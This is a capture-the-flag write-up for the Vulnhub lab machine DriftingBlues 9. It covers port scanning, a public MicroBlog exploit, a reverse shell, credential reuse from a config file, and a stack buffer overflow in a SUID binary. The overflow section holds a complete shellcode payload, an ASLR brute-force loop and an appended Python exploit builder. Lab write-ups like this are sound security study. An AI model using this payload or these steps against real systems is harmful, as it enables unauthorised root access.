Vulnhub DriftingBlues: 9 (final)

Vishal
4 min readMay 12, 2021

This is the write-up for the boot2root machine of DriftingBlues series. If you want to try it along with me, you can download it from here.

Start nmap and scan for all open ports.

only three ports open

Service version detection using nmap.

Service version detection using nmap

Ports 111 and 48331 have nothing interesting, so I open the IP address directly in the browser.

Viewing the page source shows that the site runs MicroBlog v.1.0.1.

page source showing MicroBlog version

A Google search gave the exploit as the very first link. I downloaded it to my local machine, ran it against the target and got code execution.

python2 33070.py http://192.168.9.97

As the above shell is not very friendly, I created a shell script with a reverse shell payload and downloaded it onto the box, then started a netcat listener on Kali to catch the reverse shell.

reverse shell from the box

Now that I have a better shell: the box has a user "clapton", and base.inc.php contains the same username along with his password. With that password I am able to log in as clapton.

clapton user

note.txt is a clear hint that we need a buffer overflow to get root. The SUID binary "input" is what we have to exploit with the BoF to become root on the box.

Up to this point the box is very easy. To work on the BoF I transfer the binary to my Kali machine.

Let's use gdb, pattern_create.rb and pattern_offset.rb.

1. Start the binary under gdb.

2. Provide a string of around 200 characters and observe the segmentation fault.

3. Examine ESP: it is full of A's.

4. Create a cyclic pattern with pattern_create.rb so we can find the exact number of bytes after which EIP is overwritten.

create a pattern

5. Feed the value found in EIP to pattern_offset.rb to learn after how many bytes we overwrite EIP. After 171 bytes we overwrite EIP.

6. To confirm this, send a string of 171 "A" + "BBBB" + 80 "D"; EIP should now read 0x42424242.

Instead of BBBB we need an address that lands execution in our shellcode. I will use the same shellcode used here. We also need a NOP (no operation) sled so that the return address does not have to hit the first byte of the shellcode exactly. To test the exploit locally, ASLR (Address Space Layout Randomization) must be off; on my Kali machine it is on, so I set /proc/sys/kernel/randomize_va_space to 0.

0x42424242 (BBBB) lands in EIP, 0x90 is the NOP sled and the shellcode is shown in green. On the victim ASLR is on, and turning it off needs root privileges, which is exactly what we do not have. For EIP we can use any address inside the NOP sled; I used 0xbf900de0, which must be written in reverse (little-endian) byte order, i.e. "\xe0\x0d\x90\xbf". To get around ASLR we run the program in a loop until the guessed address happens to fall inside the sled.

Final Payload (the python here must be Python 2: Python 3's print() would UTF-8 encode the non-ASCII bytes and corrupt the payload):

$(python -c 'print("A"*171 + "\xe0\x0d\x90\xbf" + "\x90" * 48 + "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")')

for i in {1..1000}; do (echo $i && ./input $(python -c 'print("A"*171 + "\xe0\x0d\x90\xbf" + "\x90" * 48 + "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")')); done

When I ran the above loop it took 924 tries to get the root shell. The count will be different in your case.
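The pattern_offset step and the payload layout above are easy to get subtly wrong (wrong endianness, a bad byte that bash eats, or Python 3 mangling the bytes), so here is an added example that puts both in code. It is not code from the original post: the offset, return address, NOP count and shellcode are the page's own values, the cyclic pattern follows the same Aa0Aa1... scheme as pattern_create.rb, and the function names and the argv bad-byte list are my own assumptions.

```python
import struct
import sys
from string import ascii_uppercase, ascii_lowercase, digits

# Values taken from the write-up above.
OFFSET = 171            # bytes of padding before EIP, as found with pattern_offset
RET_ADDR = 0xBF900DE0   # guessed stack address inside the NOP sled (ASLR is on)
NOP_LEN = 48

# 32-bit Linux shellcode used on the page: setuid(0) then execve("/bin//sh", ["/bin//sh"], NULL)
SHELLCODE = (
    b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80"   # xor eax,eax; mov ebx,eax; mov al,23; int 0x80  (setuid(0))
    b"\x31\xd2\x52"                       # xor edx,edx; push edx  (NUL terminator for the string)
    b"\x68\x6e\x2f\x73\x68"               # push "n/sh"
    b"\x68\x2f\x2f\x62\x69"               # push "//bi"
    b"\x89\xe3\x52\x53\x89\xe1"           # ebx=&"//bin/sh"; push NULL; push ebx; ecx=&argv
    b"\x8d\x42\x0b\xcd\x80"               # eax=11 (execve); int 0x80
)


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1Aa2...), same scheme as pattern_create.rb."""
    out = bytearray()
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, eip):
    """Offset of the four bytes that ended up in EIP, like pattern_offset.rb.

    eip may be the register value as shown by gdb (an int, read little-endian)
    or the raw 4 bytes. Returns -1 if the value is not part of the pattern.
    """
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    return pattern.find(needle)


def build_payload(offset=OFFSET, ret_addr=RET_ADDR, nop_len=NOP_LEN, shellcode=SHELLCODE):
    """padding + return address (little-endian) + NOP sled + shellcode.

    The return address points into the sled that follows it on the stack,
    so any guess that lands inside the 48 NOPs slides into the shellcode.
    """
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode


# Bytes that break passing the payload through $(...) as an argv string:
# NUL terminates the C string, default IFS (space, tab, newline) splits words,
# and glob characters may be expanded by the shell. (Assumed list, not from the page.)
ARGV_BAD_BYTES = {0x00, 0x09, 0x0A, 0x20, ord("*"), ord("?"), ord("[")}


def argv_bad_bytes(payload):
    """Set of offending bytes present in payload; empty means it is safe as argv[1]."""
    return {b for b in payload if b in ARGV_BAD_BYTES}


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "pattern":
        sys.stdout.buffer.write(cyclic_pattern(200))   # feed this to the binary under gdb
    else:
        payload = build_payload()
        bad = argv_bad_bytes(payload)
        if bad:
            sys.exit("payload contains argv-unsafe bytes: %s" % sorted(bad))
        # Write raw bytes, not print(): under Python 3 print() would UTF-8 encode 0xe0 etc.
        sys.stdout.buffer.write(payload)
```

Run with Python 3 as `./input "$(python3 exploit.py)"` inside the same brute-force loop as above; `python3 exploit.py pattern` produces the 200-byte pattern for the gdb step, and once EIP reads e.g. 0x41376641 the offset comes back from `pattern_offset(cyclic_pattern(200), 0x41376641)`.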

Final Flag:

Thanks for reading. Hope you like it.
